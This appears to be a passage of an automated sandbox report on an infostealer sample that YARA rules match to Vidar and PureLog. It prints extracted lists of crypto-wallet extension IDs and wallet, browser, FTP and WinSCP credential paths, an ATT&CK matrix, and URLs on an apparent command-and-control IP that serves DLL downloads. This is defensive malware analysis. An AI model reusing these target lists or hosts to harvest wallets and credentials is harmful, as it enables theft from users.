(Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0dus\exodus.wallet\\seed.secoS
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4076, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.45d3258.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.43f3218.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5960000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.45d3258.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5960000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4493238.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.43f3218.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4493238.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1758894906.0000000005960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe PID: 6308, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4076, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA0C40 sqlite3_bind_zeroblob,1_2_6CCA0C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA0D60 sqlite3_bind_parameter_name,1_2_6CCA0D60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC8EA0 sqlite3_clear_bindings,1_2_6CBC8EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6CCA0B40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC6410 bind,WSAGetLastError,1_2_6CBC6410

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		Boot or Logon Initialization Scripts111
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Credentials in Registry                        		1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                        Obfuscated Files or Information                        		Security Account Manager3
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Screen Capture                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Software Packing                        		NTDS54
                        System Information Discovery                        		Distributed Component Object ModelInput Capture114
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets141
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials31
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                        Virtualization/Sandbox Evasion                        		DCSync12
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Process Injection                        		Proc Filesystem1
                        System Owner/User Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1429063 Sample: SecuriteInfo.com.Win32.Coin... Startdate: 20/04/2024 Architecture: WINDOWS Score: 100 23 windowsupdatebg.s.llnwi.net 2->23 25 steamcommunity.com 2->25 27 2 other IPs or domains 2->27 33 Multi AV Scanner detection for domain / URL 2->33 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 10 other signatures 2->39 7 SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe 3 2->7         started        signatures3 process4 signatures5 41 Found many strings related to Crypto-Wallets (likely being stolen) 7->41 43 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->43 10 MSBuild.exe 36 7->10         started        process6 dnsIp7 29 37.27.87.155, 443, 49732, 49733 UNINETAZ Iran (ISLAMIC Republic Of) 10->29 31 steamcommunity.com 23.76.43.59, 443, 49731 AMXArgentinaSAAR United States 10->31 15 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 10->15 dropped 17 C:\Users\user\AppData\...\softokn3[1].dll, PE32 10->17 dropped 19 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 10->19 dropped 21 10 other files (none is malicious) 10->21 dropped 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 10->45 47 Found many strings related to Crypto-Wallets (likely being stolen) 10->47 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->49 51 5 other signatures 10->51 file8 signatures9

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe24%ReversingLabsWin32.Trojan.CoinminerX
                        SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe26%VirustotalBrowse
                        SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\freebl3.dll0%VirustotalBrowse
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%VirustotalBrowse
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%VirustotalBrowse
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%VirustotalBrowse
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll1%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                        windowsupdatebg.s.llnwi.net0%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        https://mozilla.org0/0%URL Reputationsafe
                        https://37.27.87.155/sqln.dll3%VirustotalBrowse
                        https://37.27.87.155/sqln.dll#3%VirustotalBrowse
                        https://37.27.87.155/4%VirustotalBrowse
                        https://37.27.87.155/18%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        steamcommunity.com
                        		23.76.43.59
                        		truefalse
                          		high
                          fp2e7a.wpc.phicdn.net
                          		192.229.211.108
                          		truefalseunknown
                          windowsupdatebg.s.llnwi.net
                          		69.164.42.0
                          		truefalseunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://37.27.87.155/sqln.dllfalseunknown
                          https://37.27.87.155/softokn3.dllfalse
                            		unknown
                            https://37.27.87.155/nss3.dllfalse
                              		unknown
                              https://37.27.87.155/vcruntime140.dllfalse
                                		unknown
                                https://37.27.87.155/msvcp140.dllfalse
                                  		unknown
                                  https://37.27.87.155/falseunknown
                                  https://37.27.87.155/freebl3.dllfalse
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabDBKKKEHD.1.drfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=DBKKKEHD.1.drfalse
                                        		high
                                        https://37.27.87.155/mozglue.dllnMSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://steamcommunity.com/login/home/?goto=profiles%2F7656119967301988876561199673019888[1].htm.1.drfalse
                                            		high
                                            https://steamcommunity.com/?subsection=broadcastsMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                              		high
                                              https://37.27.87.155GHCBGMSBuild.exe, 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		low
                                                https://37.27.87.155/sqln.dll#MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalseunknown
